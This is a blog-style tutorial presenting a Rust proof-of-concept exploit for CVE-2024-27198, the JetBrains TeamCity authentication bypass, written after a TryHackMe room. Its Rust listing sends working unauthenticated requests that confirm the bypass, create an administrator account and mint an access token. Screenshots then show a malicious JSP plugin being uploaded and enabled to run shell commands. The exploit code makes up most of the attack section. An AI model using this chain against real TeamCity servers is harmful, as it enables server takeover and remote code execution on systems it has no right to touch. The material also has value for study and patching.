# CVE-2024-27198

Hello everyone, today we have something different: we are going to write a PoC for CVE-2024-27198, an authentication bypass affecting JetBrains TeamCity On-Premises versions prior to 2023.11.4. What made me think of writing this exploit was a TryHackMe machine called Brains: <https://medium.com/@jfjbn4/tryhackme-brains-writeup-987dbdfcd963>

I used an exploit there and thought, why don't I make one myself? And here it is.

***

## Git.

All of the code lives in my Git repo.

{% embed url="<https://github.com/Cythonic1/CVE-2024-27198_POC>" %}

## What is CVE-2024-27198.

CVE-2024-27198 is an authentication bypass vulnerability that lets an unauthenticated attacker reach endpoints that normally require authentication. It is rated critical (CVSS 9.8) because those endpoints include the REST API used to create users and access tokens, which is enough to take over the server. The root cause, as the two write-ups below explain, is in how TeamCity's `BaseController` handles a request that produced a 404: if that request carries a `jsp` parameter, the controller replaces the view with the parameter's value and forwards to it internally, and the forwarded request never goes through the authentication check the target endpoint normally gets.

{% embed url="<https://www.hackthebox.com/blog/cve-2024-27198-explained>" %}

{% embed url="<https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/>" %}

Hack The Box and Rapid7 explain the vulnerability better than I can, so here we are just going to go through the code and explain it.

## The 3 Rules.

To exploit this vulnerability, three rules must be satisfied:

1. The request must produce a 404. Simply request a nonexistent endpoint.
2. The request must carry a `jsp` URL parameter whose value is the authenticated endpoint we want to reach.
3. The value must end with `;.jsp`. The server only accepts a `jsp` value that ends in `.jsp`; the `;` turns that suffix into a servlet path parameter, which the container strips when it resolves the forwarded path, so `/app/rest/server;.jsp` is forwarded as `/app/rest/server`.

One caveat from the Rapid7 analysis: a `jsp` value containing `admin/` is rejected, so the admin web pages cannot be reached this way directly. The REST API under `/app/rest/` is the target, and it is enough to create an administrator and mint a token.

Using such a URL on a vulnerable version will let you reach secured endpoints:

`{ip_address}/sdkjhdfajghsjdhf?jsp=/app/rest/server;.jsp`

1. `/sdkjhdfajghsjdhf`: a nonexistent page, so the request returns 404.
2. `jsp=/app/rest/server`: the page we want to reach, passed in the `jsp` parameter.
3. `;.jsp`: the suffix that makes the value pass the `.jsp` check and is dropped again when the path is resolved.
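To make the three rules concrete, here is a small model of the server-side checks they have to satisfy, written as an added example for this write-up (it is not the PoC's own code). It follows the `getJspFromRequest` logic described in the Rapid7 analysis linked above plus the servlet container's path-parameter handling; the names `build_bypass_url`, `forwarded_view`, `strip_path_parameters` and the `/hax` path are the example's own choices.

```rust
// Added example for this write-up (not the PoC's own code): a model of the
// checks behind the three rules, following the Rapid7 analysis linked above.
// The names here (build_bypass_url, forwarded_view, ...) are the example's own.

/// Rules 1-3 in one URL: a path that 404s ("/hax" is our choice), a `jsp`
/// parameter naming the protected endpoint, and a trailing `;.jsp`.
pub fn build_bypass_url(base: &str, endpoint: &str) -> String {
    format!("{}/hax?jsp={};.jsp", base.trim_end_matches('/'), endpoint)
}

/// Model of the vulnerable `getJspFromRequest` check: the `jsp` value is
/// only used when it ends with ".jsp" and does not contain "admin/".
pub fn get_jsp_from_request(jsp_param: Option<&str>) -> Option<&str> {
    match jsp_param {
        Some(v) if v.ends_with(".jsp") && !v.contains("admin/") => Some(v),
        _ => None,
    }
}

/// Model of servlet path-parameter handling: in every path segment, the text
/// from the first ';' onwards is a path parameter and is dropped before the
/// dispatcher matches the path. That is what turns "/app/rest/server;.jsp"
/// into "/app/rest/server".
pub fn strip_path_parameters(path: &str) -> String {
    path.split('/')
        .map(|segment| segment.split(';').next().unwrap_or(""))
        .collect::<Vec<&str>>()
        .join("/")
}

/// Model of the 404 handler: the view swap only happens when the original
/// request produced a 404 and its own path does not already end in ".jsp".
/// Returns the path the server would forward to internally (without a fresh
/// authentication check), or None when the request would be served normally.
pub fn forwarded_view(request_path: &str, status: u16, jsp_param: Option<&str>) -> Option<String> {
    if status != 404 || request_path.ends_with(".jsp") {
        return None;
    }
    get_jsp_from_request(jsp_param).map(strip_path_parameters)
}

/// Raw `jsp` parameter of a URL (no percent-decoding; the values we use only
/// contain '/', ':', ';' and '.').
pub fn jsp_param_of(url: &str) -> Option<&str> {
    let query = url.split_once('?')?.1;
    query.split('&').find_map(|kv| kv.strip_prefix("jsp="))
}

fn main() {
    let url = build_bypass_url("http://10.10.10.10:8111", "/app/rest/server");
    // "/hax" 404s, the jsp value passes the check, the forward lands on /app/rest/server.
    println!("{} -> {:?}", url, forwarded_view("/hax", 404, jsp_param_of(&url)));

    // Three ways to break a rule: no ".jsp" suffix, an admin/ path, a request that did not 404.
    println!("{:?}", forwarded_view("/hax", 404, Some("/app/rest/server")));
    println!("{:?}", forwarded_view("/hax", 404, Some("/admin/plugins.html;.jsp")));
    println!("{:?}", forwarded_view("/", 200, Some("/app/rest/server;.jsp")));
}
```

The `admin/` check in `get_jsp_from_request` is why the PoC goes after `/app/rest/...` rather than the admin pages, and `strip_path_parameters` is the whole reason rule 3 works: the value satisfies the `.jsp` check as a string but resolves to the REST endpoint as a path.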

## The Exploit.

### Check if the target is vulnerable.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FNaGFspVba0KhGNtBRd1Y%2Fimage.png?alt=media&#x26;token=1dfb203f-b182-4ce1-a162-27fee7b2bd2a" alt=""><figcaption></figcaption></figure>

First we take the URL of the target system as a command-line argument.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2F4AzMnGSk0HhpHDjUhh5P%2Fimage.png?alt=media&#x26;token=ece2a8cb-4795-41f9-8ec5-f543d8dfb4a4" alt=""><figcaption></figcaption></figure>

Then we check whether the target system is vulnerable.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FPGeRiYWnuCb2TglvYGlA%2Fimage.png?alt=media&#x26;token=7ec6794f-55e2-4512-bcf1-caa8a4105155" alt=""><figcaption></figcaption></figure>

The is\_vuln function is simple: it returns a boolean telling us whether the bypass worked against the target.

### Generate a username and password and create the user.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FzxY59GL9Tj9KWnw2Tj1l%2Fimage.png?alt=media&#x26;token=237b0256-c7b8-4331-913b-8e90a7d750fb" alt=""><figcaption></figcaption></figure>

Here we generate a random username and password and create a new user with administrator access.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FFlKkhT5RKaduYeE6btgV%2Fimage.png?alt=media&#x26;token=940660a5-59b0-43b8-947a-e54e6e983eb8" alt=""><figcaption></figcaption></figure>

This is the create\_new\_user function, which takes the randomly generated username and password and sends them as a JSON request body to the user-creation REST endpoint, reached through the bypass URL.

### Generate a token.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FERSmKAhUDwktqulPURL1%2Fimage.png?alt=media&#x26;token=783add4a-c7b8-400e-88b6-e49ffa8a7806" alt=""><figcaption></figcaption></figure>

As you can see, we call the get\_token function, which returns either a token, nothing, or an error. In the best case it returns a valid token, so that we can upload our plugin.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FOzTO61oTyXRsNEZzgNQy%2Fimage.png?alt=media&#x26;token=0b81f9ef-08f6-482f-97fc-93ec54b3749e" alt=""><figcaption></figcaption></figure>

This is the get\_token function. It creates, through the REST API, an access token for the user with id 1, which is usually the first administrator; every later request authenticates with that token.
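Here is how those three steps (the is\_vuln probe, the user creation and the token creation) look on the wire, as an added example written for this write-up rather than the Rust from the screenshots above. It hand-builds the HTTP/1.1 requests over a plain `TcpStream` so nothing is hidden by a client library. The `/hax` path, the `poc_token` name, the `@example.com` e-mail and the hard-coded demo credentials are this example's assumptions; the REST endpoints (`/app/rest/server`, `/app/rest/users`, `/app/rest/users/id:1/tokens/<name>`) and the SYSTEM\_ADMIN JSON body are the ones the public PoCs use.

```rust
// Added example for this write-up, not the PoC's own code: the three
// unauthenticated requests behind is_vuln, create_new_user and get_token,
// built by hand so the exact bytes on the wire are visible. The "/hax" path,
// the token name and the @example.com e-mail are this example's assumptions.
use std::io::{Read, Write};
use std::net::TcpStream;

/// Assemble one raw HTTP/1.1 request. `Connection: close` so that a single
/// read_to_string drains the whole response.
fn raw_request(method: &str, host: &str, target: &str, headers: &[(&str, &str)], body: &str) -> String {
    let mut req = format!("{} {} HTTP/1.1\r\nHost: {}\r\nConnection: close\r\n", method, target, host);
    for (name, value) in headers {
        req.push_str(&format!("{}: {}\r\n", name, value));
    }
    if !body.is_empty() {
        req.push_str(&format!("Content-Length: {}\r\n", body.len()));
    }
    req.push_str("\r\n");
    req.push_str(body);
    req
}

/// The bypass from the "3 Rules" section: a path that 404s plus `jsp=<endpoint>;.jsp`.
pub fn bypass_target(endpoint: &str) -> String {
    format!("/hax?jsp={};.jsp", endpoint)
}

/// is_vuln probe: an anonymous GET to /app/rest/server normally answers 401;
/// through the bypass a vulnerable server answers 200 with its server XML,
/// while a patched one simply 404s on /hax.
pub fn probe_request(host: &str) -> String {
    raw_request("GET", host, &bypass_target("/app/rest/server"), &[], "")
}

/// JSON body for POST /app/rest/users: a SYSTEM_ADMIN role in global scope ("g").
/// Username and password are assumed to be plain alphanumerics (no JSON escaping here).
pub fn create_admin_body(username: &str, password: &str) -> String {
    format!(
        "{{\"username\":\"{u}\",\"password\":\"{p}\",\"email\":\"{u}@example.com\",\"roles\":{{\"role\":[{{\"roleId\":\"SYSTEM_ADMIN\",\"scope\":\"g\"}}]}}}}",
        u = username,
        p = password
    )
}

/// create_new_user: the user-creation endpoint, reached through the bypass.
pub fn create_admin_request(host: &str, username: &str, password: &str) -> String {
    let body = create_admin_body(username, password);
    let headers = [("Content-Type", "application/json"), ("Accept", "application/json")];
    raw_request("POST", host, &bypass_target("/app/rest/users"), &headers, &body)
}

/// get_token: mint an access token for user id 1 (usually the first admin).
pub fn token_request(host: &str, token_name: &str) -> String {
    let endpoint = format!("/app/rest/users/id:1/tokens/{}", token_name);
    raw_request("POST", host, &bypass_target(&endpoint), &[("Accept", "application/json")], "")
}

/// HTTP status of a raw response ("HTTP/1.1 200 ..." -> 200).
pub fn status_of(response: &str) -> Option<u16> {
    response.split_whitespace().nth(1)?.parse().ok()
}

/// Pull "value" out of the JSON token resource ({"name":...,"value":"..."}).
/// Substring-based on purpose: the reply is tiny and we avoid a JSON crate.
pub fn extract_token(response: &str) -> Option<String> {
    let after_key = &response[response.find("\"value\"")? + "\"value\"".len()..];
    let after_colon = after_key.trim_start().strip_prefix(':')?.trim_start();
    let inner = after_colon.strip_prefix('"')?;
    Some(inner[..inner.find('"')?].to_string())
}

fn send(host: &str, request: &str) -> std::io::Result<String> {
    let mut stream = TcpStream::connect(host)?;
    stream.write_all(request.as_bytes())?;
    let mut response = String::new();
    stream.read_to_string(&mut response)?; // raw body; chunk sizes may appear, substring checks tolerate that
    Ok(response)
}

fn main() -> std::io::Result<()> {
    // usage: <binary> host:port  (plain HTTP; TLS is out of scope for this example)
    let host = std::env::args().nth(1).unwrap_or_else(|| "127.0.0.1:8111".to_string());
    let probe = send(&host, &probe_request(&host))?;
    if status_of(&probe) != Some(200) || !probe.contains("<server") {
        println!("[-] {} does not look vulnerable", host);
        return Ok(());
    }
    println!("[+] bypass works, creating an admin user");
    let created = send(&host, &create_admin_request(&host, "cythonic_poc", "Ch4ngeMe9"))?;
    println!("[*] user creation returned {:?}", status_of(&created));
    let reply = send(&host, &token_request(&host, "poc_token"))?;
    match extract_token(&reply) {
        Some(token) => println!("[+] token for user id 1: {}", token),
        None => println!("[-] no token in reply (status {:?})", status_of(&reply)),
    }
    Ok(())
}
```

Each request goes to a path that does not exist (`/hax`) with the real endpoint tucked into the `jsp` parameter, which is exactly the pattern a defender should look for in Tomcat access logs: a 404-looking path with `?jsp=` and `;.jsp` in the query.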

### Upload payload and execute commands.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FOUQFoeAKZZQNRaPXMxIC%2Fimage.png?alt=media&#x26;token=a7920eaf-8964-4b27-87f1-752ffe8229de" alt=""><figcaption></figcaption></figure>

To do this we need a valid token, which is why the exploit cannot complete if token generation failed.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2F1JD3giyhEHoJfrlTylWS%2Fimage.png?alt=media&#x26;token=ec5c8f06-0b60-450c-9a88-2a0afc0b6b15" alt=""><figcaption></figcaption></figure>

This is the upload\_evil\_plugin function; I give the credit for the plugin to this beast:

{% embed url="<https://github.com/W01fh4cker/CVE-2024-27198-RCE>" %}

The zip file contains these two files.

![](https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FwlBTouNEUafFXxUfiBgz%2Fimage.png?alt=media\&token=7ac4eb7e-5561-4e3d-b312-9e3df2cf487d)

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2F13C7u8R5pXdQp3aNB49s%2Fimage.png?alt=media&#x26;token=a24d9ed6-9cd4-4611-bb22-7d2a191f309f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FscfMABeWKycqRVXJ4Mwq%2Fimage.png?alt=media&#x26;token=db103c65-2647-4d81-9557-9d816808eb55" alt=""><figcaption></figcaption></figure>

For myPlugin.jsp we use JSP, which is Java code that runs inside the web server, and the XML file is the plugin descriptor that tells TeamCity the details of the plugin. We send both files as parts of a multipart upload.

#### Enable the plugin.

After uploading the plugin we just need to enable it.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2Fy8bIOnuGHUC0UXDxlPp1%2Fimage.png?alt=media&#x26;token=86d167c1-21cf-488c-82c2-786ef6b796cd" alt=""><figcaption></figcaption></figure>

#### Execute commands.

After uploading and enabling the plugin we can execute commands.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2Fc8xLr73ljwXCIxAV2lHD%2Fimage.png?alt=media&#x26;token=12df69a9-1128-450b-ae8b-4f0e2798baa4" alt=""><figcaption></figcaption></figure>

As you can see, we can access our plugin URL and execute commands.

### Running the code.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FVZj1zFywbgFN2T6xm8Kk%2Fimage.png?alt=media&#x26;token=308d6619-6249-4334-8f22-72e4119ff11e" alt=""><figcaption></figcaption></figure>

As you can see, we were able to execute our command, `whoami`. Since I am running this in Docker, it comes back as the root user.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FO9TQy9uWGZyxGk8f86PD%2Fimage.png?alt=media&#x26;token=7b884026-8b71-4e07-9e29-7c93ca698ee2" alt=""><figcaption></figcaption></figure>

And here, from the web, we can execute commands through the GET parameter.

## Conclusion.

In the end, what actually made me try to write this exploit is, first, that I love creating exploits, especially in Rust, and second, that I wanted to see how a big product such as JetBrains could have such a weak vulnerability.

Finally, I would like to give credit to:

{% embed url="<https://github.com/W01fh4cker/CVE-2024-27198-RCE>" %}

I learned from him how to get the Docker container and the Java exploit; he is a master.
